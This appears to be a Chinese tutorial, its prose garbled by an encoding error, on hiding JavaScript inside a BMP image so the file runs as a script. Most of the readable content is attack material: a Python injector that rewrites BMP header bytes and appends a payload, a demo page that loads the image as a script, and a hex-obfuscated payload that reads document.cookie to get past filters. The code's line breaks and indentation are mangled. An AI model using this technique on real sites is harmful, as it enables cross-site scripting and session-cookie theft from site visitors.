Ҳ�����������е�JS���룬�����൱��Ȥ��
ִ��JSע���Ľű�
����
1. ��ԭBMP�ļ��ĵ����������ֽ��滻Ϊ\x2F\x2A�� ��Ӧjs�е�ע�ͷ���/*
BMP�ļ��ĵ������ġ��塢���ֽڱ�ʾBMP�ļ��Ĵ�С
2. ��BMP�ļ�ĩβ����
��1��\xFF
��2��\x2A\x2F,��Ӧ��js�е�ע�ͷ���*/
��3��\x3D\x31\x3B,��Ӧ��=1; ��Ϊ��α����BMP��ʽ
��4�����Ƶ�JS����
#!/usr/bin/env python2.7
import os
import argparse
def injectFile(payload,fname):
f = open(fname,"r+b")
b = f.read()
f.close()f = open(fname,"w+b")
f.write(b)
f.seek(2,0)
f.write(b'\x2F\x2A')
f.close()f = open(fname,"a+b")
f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
f.write(payload)
f.close()
return Trueif __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("filename",help="the bmp file name to infected")
parser.add_argument("js_payload",help="the payload to be injected. For exampe: \"alert(1);\"")
args = parser.parse_args()
injectFile(args.js_payload,args.filename)
��ʾ
������ʾʵ��Ч��
���нű�����ָ����JS����д�뵽������BMPͼƬ��
��ʽ��python �ű��� -i ����BMP��ʽͼƬ JSPayload
python BMPinjector.py -i 1.bmp "alert(document.cookie);"
��ʾҳ��run.html
<html> <head><title>Opening an image</title></head> <body> <img src="1.bmp"\> <script src="1.bmp"></script> </body> </html>
���� http://xxx/run.html
Ҳ���Բ���js�������ƹ�����,�õ�������һ����Ч��
python BMPinjector.py -i 1.bmp "var _0x9c4c=\"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\"; function MsgBox(_0xccb4x3){alert(eval(_0xccb4x3));} ;MsgBox(_0x9c4c);"
ע�⣺\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65��Ӧdocument.cookie
���
http://marcoramilli.blogspot.com/2013/10/hacking-through-images.html